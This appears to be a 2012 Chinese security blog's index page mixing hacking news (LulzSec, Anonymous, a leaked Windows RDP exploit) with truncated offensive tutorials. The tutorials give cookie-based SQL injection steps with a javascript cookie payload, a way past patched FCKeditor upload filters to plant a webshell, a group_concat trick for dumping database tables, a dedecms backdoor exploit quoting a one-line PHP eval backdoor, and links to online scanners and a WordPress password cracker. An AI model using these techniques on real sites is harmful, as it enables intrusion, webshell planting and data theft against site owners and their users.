黑客组织LulzSec复出 公布17万军队成员账户

分类:新闻 | 2012-03-29 | 撸过 377 次
0人扯谈

2011年的7月下旬,黑客组织LulzSec的一些成员被逮捕。该黑客组织曾于2011年在网站MilitarySingles.com上暴露了政府机构和公司成千上万个成员的电子邮件帐户,包括联邦调查局,中央情报局,索尼,甚至PBS。而似乎在沉寂了数个月后,LulzSec又有新动作,声称已经暴露近171,000个军队成员的帐户。

 

“这里有几份电子邮件,比如@us.army.mil carney.navy.mil; greatlakes.cnet.navy.mil @ microsoft.com等”LulzSec组织在PasteBin网站发布了一则警告,并表示“手握”包括单身士兵在交[......]

继续阅读

Cookies注入步骤

分类:安全 | 2012-03-26 | 撸过 1,385 次
0人扯谈

Cookies注入步骤

1)寻找形如“*.asp?id=x”类的带参数的rul

2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的

3)清空浏览器地址,输入“

javascript:alert(document.cookie=“id=”+escape("x"));

按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常,

说明代码是用Request("ID")这种格式收集数据的,可以利用cookies进行注入

4)重复上面的步骤,将常规脚本注入判断语句戴入上面的URL:"

javascript:javascr[......]

继续阅读

fckeditor上传突破_方法

分类:安全 | 2012-03-26 | 撸过 582 次
0人扯谈

有很多已经修补过的fckeditor 我们上传x.asp;y.jpg的时候 通常会变成x_asp;y.jpg 让我们的马失效

 

利用二次上传 可以 生成x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在www.webshell.cc/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

新建 一个x.asp的文件夹 可饶过, 但有些变态的 程[......]

继续阅读

php mysql注入的一种快速有效union方法select出数据库内容

分类:安全 | 2012-03-23 | 撸过 490 次
0人扯谈

php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。

 

函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列)

 

例如:

 

select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g

 

那么将得到:

 

1|张三|83023023],|李四|13893232322],.....

 

(注意上面查询结果不是一行多列,而是一行一列)

 

假设原来的sql注入[......]

继续阅读

dedecms 5.7 一句话后门利用 exp

分类:安全 | 2012-03-22 | 撸过 892 次
0人扯谈

author:舞林

tx微博:http://t.qq.com/wulinlw

晚上看到这个

http://www.wooyun.org/bug.php?action=view&id=5416

shopcar.class.php 被植入一句话

@eval(file_get_contents('php://input'));

去官网下了一套回来,看了下代码,

class MemberShops
{
    var $OrdersId;
    var $productsId;
    function __construct()
    {
        $this->Orders[......]

继续阅读

在线渗透测试工具集合

分类:安全 | 2012-03-22 | 撸过 1,180 次
1人扯谈

家试试看吧,呵呵,不过下面那个破解wordpress密码的还能用

在线端口扫描:

http://scan.subhashdasyam.com/port-scanner.php

在线VNC扫描:

http://scan.subhashdasyam.com/dumper-with-login.php

在线SSH扫描:

http://scan.subhashdasyam.com/ssh-scanner.php

在线后台地址扫描:

http://scan.subhashdasyam.com/admin-page-finder.php

在线Wordpress管理员密码破解:

http[......]

继续阅读

我国大陆去年2807个政府网站遭篡改

分类:新闻 | 2012-03-20 | 撸过 389 次
0人扯谈

国家互联网应急中心(CNCERT)今天在此间发布的《2011年中国互联网网络安全态势报告》(以下简称“报告”)指出:2011年,我国遭受更为严重复杂的境外网络攻击,网络银行和工业控制系统安全收到的威胁显著上升,恶意程序引发的手机安全事件呈现多发态势。

  ■ 境外攻击来源美国居首

  报告指出,2011年,我国遭受境外网络攻击持续增多,境外有近4.7万个IP地址作为木马或僵尸网络控制服务器,控制我国境内近890万台主机,比2010年控制主机数增长近1倍,其中美国以9500多个IP地址控制我国境内近885万台主机,高居榜首。网站安全方面,境外1.18万多个IP通过植入后门对境内近1.06万个[......]

继续阅读

Anonymous宣称3月31日将使全球互联网瘫痪

分类:新闻 | 2012-03-20 | 撸过 377 次
0人扯谈

黑客组织匿名者(Anonymous)近日对外宣称,将于3月31日攻击13个DNS根服务器,已达到让全球互联网瘫痪的目的,此次攻击作为其发起的“Operation Global Blackout”行动的一部分,是为了抗议“SOPA(美国《网络反盗版法案》)和为了一己私利而置世界于饥饿之中的华尔街银行家与资本家们”。

SOPA/PIPA法案希望进一步强化保护知识产权的力度,当版权方发现侵犯版权内容时,可以要求网站(包括搜索引擎、支付平台、广告平台等)屏蔽所有内容,甚至可以要求互联网接入服务商(ISP)停止向网站提供服务,随后再进行司法程序。并且它规定如果没有"事先采取防盗版的措施",也就是事先[......]

继续阅读

微软或其安全合作伙伴外泄恶性代码

分类:新闻 | 2012-03-18 | 撸过 408 次
0人扯谈

去年有人向微软所提交的一个Windows系统高危漏洞代码现在不知怎么回事居然外泄了,但是目前还不知道通过微软自己还是它的安全合作伙伴之一外泄的。 这个漏洞针对的Windows远程桌面的一个弱点,使攻击者可以完全控制整个系统并且很容易扩散到其他电脑的远程桌面之上。

Microsoft-campus

微软在本周早些时候曾为这个漏洞发布了一个补丁,但是仅仅在几天之后国内网站就爆出了一个被称为"rdpclient.exe"的程序文件。独立安全研究人员Luigi Auriemma在去年8月时首个向微软提交了这个漏洞,不过看这个文件里内容就会发现其这个“漏洞的描述很是模糊,并且使用的是预建的数据包”--这些数据包也是他原先提[......]

继续阅读

Anonymous 否认 Anonymous-OS 出自其手

分类:新闻 | 2012-03-17 | 撸过 411 次
0人扯谈

之前曾被报道过的基于 Ubuntu11.10, 由匿名组织 Anonymous 制作的 Anonymous-OS 被证实并非出自 Anonymous 之手。由于无法确认作者,因此无法确认该操作系统的安全性。SourceForge 在该项目出现后关闭了此项目。也请下载了此 CD 的用户注意安全。

 

之前被众多网站所报道的 Anonymous-OS 自称是一个基于 Ubuntu 11.10 的 LiveCD, 附带许多黑客工具,“用来测试网站安全性的”工具。但事实证明,这个 LiveCD 并非真正出于 Anonymous 之手。该操作系统的作者伪装成 Anonymous 的一员,并[......]

继续阅读

第 1 页,共 3 页123